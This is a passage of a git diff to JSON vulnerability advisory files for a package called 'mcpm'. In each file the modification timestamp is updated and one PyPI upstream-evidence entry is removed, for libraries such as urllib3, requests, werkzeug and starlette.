a/advisories/BREW-mcpm-CVE-2021-28363.json +++ b/advisories/BREW-mcpm-CVE-2021-28363.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2021-28363", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-5phf-pp7p-vc2r", "CVE-2021-28363", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2021-33503.json b/advisories/BREW-mcpm-CVE-2021-33503.json index 7b42cbeee95..40983857c56 100644 --- a/advisories/BREW-mcpm-CVE-2021-33503.json +++ b/advisories/BREW-mcpm-CVE-2021-33503.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2021-33503", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-q2q7-5pp4-w6pg", "CVE-2021-33503", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2021-33880.json b/advisories/BREW-mcpm-CVE-2021-33880.json index 31509283965..b25107b2880 100644 --- a/advisories/BREW-mcpm-CVE-2021-33880.json +++ b/advisories/BREW-mcpm-CVE-2021-33880.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2021-33880", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-8ch4-58qp-g3mp", "CVE-2021-33880", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "websockets", - "subject_version": "16.0", - "key": "pkg:pypi/websockets@16.0", - "resource": "websockets" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2021-41945.json b/advisories/BREW-mcpm-CVE-2021-41945.json index 5420b7e21b2..5ad71216bb9 100644 --- a/advisories/BREW-mcpm-CVE-2021-41945.json +++ b/advisories/BREW-mcpm-CVE-2021-41945.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2021-41945", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-h8pj-cxx2-jfg2", "CVE-2021-41945", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "httpx", - "subject_version": "0.28.1", - "key": "pkg:pypi/httpx@0.28.1", - "resource": "httpx" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2022-0338.json b/advisories/BREW-mcpm-CVE-2022-0338.json index 33d94e69766..742c9d740fc 100644 --- a/advisories/BREW-mcpm-CVE-2022-0338.json +++ b/advisories/BREW-mcpm-CVE-2022-0338.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2022-0338", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-39ph-wr67-j4xq", "CVE-2022-0338", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "loguru", - "subject_version": "0.7.3", - "key": "pkg:pypi/loguru@0.7.3", - "resource": "loguru" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2022-29217.json b/advisories/BREW-mcpm-CVE-2022-29217.json index 6eeb4e7d14c..e3a7ceb5c55 100644 --- a/advisories/BREW-mcpm-CVE-2022-29217.json +++ b/advisories/BREW-mcpm-CVE-2022-29217.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2022-29217", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-ffqj-6fqr-9h24", "CVE-2022-29217", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2022-40896.json b/advisories/BREW-mcpm-CVE-2022-40896.json index f609e4b1466..e7ab70705c4 100644 --- a/advisories/BREW-mcpm-CVE-2022-40896.json +++ b/advisories/BREW-mcpm-CVE-2022-40896.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2022-40896", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-mrwq-x4v8-fh7p", "CVE-2022-40896", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.20.0", - "key": "pkg:pypi/pygments@2.20.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-23934.json b/advisories/BREW-mcpm-CVE-2023-23934.json index 1664f6993bd..9834473e1c3 100644 --- a/advisories/BREW-mcpm-CVE-2023-23934.json +++ b/advisories/BREW-mcpm-CVE-2023-23934.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-23934", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-px8h-6qxv-m22q", "CVE-2023-23934", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-25577.json b/advisories/BREW-mcpm-CVE-2023-25577.json index 0bbc74c406b..d8db689d03e 100644 --- a/advisories/BREW-mcpm-CVE-2023-25577.json +++ b/advisories/BREW-mcpm-CVE-2023-25577.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-25577", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-xg9f-g7g7-2323", "CVE-2023-25577", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-26302.json b/advisories/BREW-mcpm-CVE-2023-26302.json index af02567b7f0..916ec98e519 100644 --- a/advisories/BREW-mcpm-CVE-2023-26302.json +++ b/advisories/BREW-mcpm-CVE-2023-26302.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-26302", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-jrwr-5x3p-hvc3", "CVE-2023-26302", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-26303.json b/advisories/BREW-mcpm-CVE-2023-26303.json index 889da61a600..8482dcb45b7 100644 --- a/advisories/BREW-mcpm-CVE-2023-26303.json +++ b/advisories/BREW-mcpm-CVE-2023-26303.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-26303", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-vrjv-mxr7-vjf8", "CVE-2023-26303", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "markdown-it-py", - "subject_version": "4.2.0", - "key": "pkg:pypi/markdown-it-py@4.2.0", - "resource": "markdown-it-py" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-29159.json b/advisories/BREW-mcpm-CVE-2023-29159.json index cf3c1ab311c..850f5756e4d 100644 --- a/advisories/BREW-mcpm-CVE-2023-29159.json +++ b/advisories/BREW-mcpm-CVE-2023-29159.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-29159", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-v5gw-mw7f-84px", "CVE-2023-29159", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-29483.json b/advisories/BREW-mcpm-CVE-2023-29483.json index 25d6f36379a..ec90b8a730b 100644 --- a/advisories/BREW-mcpm-CVE-2023-29483.json +++ b/advisories/BREW-mcpm-CVE-2023-29483.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-29483", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-3rq5-2g8h-59hc", "CVE-2023-29483", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "dnspython", - "subject_version": "2.8.0", - "key": "pkg:pypi/dnspython@2.8.0", - "resource": "dnspython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-30798.json b/advisories/BREW-mcpm-CVE-2023-30798.json index ea60ba1b6e1..fa8ad9f10ea 100644 --- a/advisories/BREW-mcpm-CVE-2023-30798.json +++ b/advisories/BREW-mcpm-CVE-2023-30798.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-30798", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-74m5-2c7w-9w3x", "CVE-2023-30798", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-32681.json b/advisories/BREW-mcpm-CVE-2023-32681.json index fd9aa3bdac6..378d2959d48 100644 --- a/advisories/BREW-mcpm-CVE-2023-32681.json +++ b/advisories/BREW-mcpm-CVE-2023-32681.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-32681", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-j8r2-6x86-q33q", "CVE-2023-32681", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-43804.json b/advisories/BREW-mcpm-CVE-2023-43804.json index c6b2084b627..68a3e320ff9 100644 --- a/advisories/BREW-mcpm-CVE-2023-43804.json +++ b/advisories/BREW-mcpm-CVE-2023-43804.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-43804", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-v845-jxx5-vc9f", "CVE-2023-43804", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-45803.json b/advisories/BREW-mcpm-CVE-2023-45803.json index 12586419d71..973bf828b3d 100644 --- a/advisories/BREW-mcpm-CVE-2023-45803.json +++ b/advisories/BREW-mcpm-CVE-2023-45803.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-45803", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-g4mx-q9vg-27p4", "CVE-2023-45803", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2023-46136.json b/advisories/BREW-mcpm-CVE-2023-46136.json index 76b64498e4c..627c24d8cd2 100644 --- a/advisories/BREW-mcpm-CVE-2023-46136.json +++ b/advisories/BREW-mcpm-CVE-2023-46136.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2023-46136", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-hrfv-mqp8-q5rw", "CVE-2023-46136", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-24762.json b/advisories/BREW-mcpm-CVE-2024-24762.json index 48ba0eb0aa3..31e09f39690 100644 --- a/advisories/BREW-mcpm-CVE-2024-24762.json +++ b/advisories/BREW-mcpm-CVE-2024-24762.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-24762", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-2jv5-9r88-3w3p", "CVE-2024-24762", @@ -44,14 +44,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-34069.json b/advisories/BREW-mcpm-CVE-2024-34069.json index 56f97bb5535..fcd3d3a2589 100644 --- a/advisories/BREW-mcpm-CVE-2024-34069.json +++ b/advisories/BREW-mcpm-CVE-2024-34069.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-34069", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-2g68-c3qc-8985", "CVE-2024-34069", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-35195.json b/advisories/BREW-mcpm-CVE-2024-35195.json index e40acd2fa68..e74eb0a020e 100644 --- a/advisories/BREW-mcpm-CVE-2024-35195.json +++ b/advisories/BREW-mcpm-CVE-2024-35195.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-35195", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-9wx4-h78v-vm56", "CVE-2024-35195", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-3651.json b/advisories/BREW-mcpm-CVE-2024-3651.json index 2d428ed7951..3c128cccb84 100644 --- a/advisories/BREW-mcpm-CVE-2024-3651.json +++ b/advisories/BREW-mcpm-CVE-2024-3651.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-3651", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-jjg7-2v4v-x38h", "CVE-2024-3651", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.18", - "key": "pkg:pypi/idna@3.18", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-37568.json b/advisories/BREW-mcpm-CVE-2024-37568.json index d484de7b89b..b44783286fb 100644 --- a/advisories/BREW-mcpm-CVE-2024-37568.json +++ b/advisories/BREW-mcpm-CVE-2024-37568.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-37568", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-5357-c2jx-v7qh", "CVE-2024-37568", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "authlib", - "subject_version": "1.7.2", - "key": "pkg:pypi/authlib@1.7.2", - "resource": "authlib" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-37891.json b/advisories/BREW-mcpm-CVE-2024-37891.json index b62da0b34c5..d43b18e5b72 100644 --- a/advisories/BREW-mcpm-CVE-2024-37891.json +++ b/advisories/BREW-mcpm-CVE-2024-37891.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-37891", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-34jh-p97f-mpxf", "CVE-2024-37891", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-41672.json b/advisories/BREW-mcpm-CVE-2024-41672.json index ca0751e7456..e24f1e6f6dc 100644 --- a/advisories/BREW-mcpm-CVE-2024-41672.json +++ b/advisories/BREW-mcpm-CVE-2024-41672.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-41672", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-w2gf-jxc9-pf2q", "CVE-2024-41672", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "duckdb", - "subject_version": "1.5.4", - "key": "pkg:pypi/duckdb@1.5.4", - "resource": "duckdb" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-47081.json b/advisories/BREW-mcpm-CVE-2024-47081.json index ac00f9e2fcc..1f08d38b2b1 100644 --- a/advisories/BREW-mcpm-CVE-2024-47081.json +++ b/advisories/BREW-mcpm-CVE-2024-47081.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-47081", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-9hjg-9r4m-mvj7", "CVE-2024-47081", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "requests", - "subject_version": "2.34.2", - "key": "pkg:pypi/requests@2.34.2", - "resource": "requests" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-47874.json b/advisories/BREW-mcpm-CVE-2024-47874.json index 843f40f5964..7aa8b6b38a5 100644 --- a/advisories/BREW-mcpm-CVE-2024-47874.json +++ b/advisories/BREW-mcpm-CVE-2024-47874.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-47874", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-f96h-pmfr-66vw", "CVE-2024-47874", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.3.1", - "key": "pkg:pypi/starlette@1.3.1", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-49766.json b/advisories/BREW-mcpm-CVE-2024-49766.json index 0d5817dcf35..36ffb4b820e 100644 --- a/advisories/BREW-mcpm-CVE-2024-49766.json +++ b/advisories/BREW-mcpm-CVE-2024-49766.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-49766", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-f9vj-2wh5-fj8j", "CVE-2024-49766", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-49767.json b/advisories/BREW-mcpm-CVE-2024-49767.json index 7dc74852008..713bcac3a6d 100644 --- a/advisories/BREW-mcpm-CVE-2024-49767.json +++ b/advisories/BREW-mcpm-CVE-2024-49767.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-49767", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-q34m-jh98-gwm2", "CVE-2024-49767", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "werkzeug", - "subject_version": "3.1.8", - "key": "pkg:pypi/werkzeug@3.1.8", - "resource": "werkzeug" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-53861.json b/advisories/BREW-mcpm-CVE-2024-53861.json index 7df577ae263..191a778d8c0 100644 --- a/advisories/BREW-mcpm-CVE-2024-53861.json +++ b/advisories/BREW-mcpm-CVE-2024-53861.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-53861", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-75c5-xw7c-p5pm", "CVE-2024-53861", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2024-53981.json b/advisories/BREW-mcpm-CVE-2024-53981.json index afc7bbe4cc8..37defb18695 100644 --- a/advisories/BREW-mcpm-CVE-2024-53981.json +++ b/advisories/BREW-mcpm-CVE-2024-53981.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2024-53981", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-59g5-xgcq-4qw3", "CVE-2024-53981", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-43859.json b/advisories/BREW-mcpm-CVE-2025-43859.json index 435aa76400f..75489ab9d1d 100644 --- a/advisories/BREW-mcpm-CVE-2025-43859.json +++ b/advisories/BREW-mcpm-CVE-2025-43859.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-43859", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-vqfr-h8mv-ghfj", "CVE-2025-43859", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "h11", - "subject_version": "0.16.0", - "key": "pkg:pypi/h11@0.16.0", - "resource": "h11" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-50181.json b/advisories/BREW-mcpm-CVE-2025-50181.json index 0c3cafe1e52..6b5d96b1ae8 100644 --- a/advisories/BREW-mcpm-CVE-2025-50181.json +++ b/advisories/BREW-mcpm-CVE-2025-50181.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-50181", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-pq67-6m6q-mj2v", "CVE-2025-50181", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-50182.json b/advisories/BREW-mcpm-CVE-2025-50182.json index 9923bea9a78..177be5ecf3d 100644 --- a/advisories/BREW-mcpm-CVE-2025-50182.json +++ b/advisories/BREW-mcpm-CVE-2025-50182.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-mcpm-CVE-2025-50182", "published": "2026-08-13T17:13:14Z", - "modified": "2026-08-13T17:13:14Z", + "modified": "2026-09-10T19:56:14Z", "upstream": [ "GHSA-48p4-8xcf-vxj5", "CVE-2025-50182", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-mcpm-CVE-2025-53365.json b/advisories/BREW-mcpm-CVE-2025-53365.json index 6ba267f7381..abb298e89bc 100644 --- a/advisories/BREW-mcpm-CVE-2025-53365.json +++ 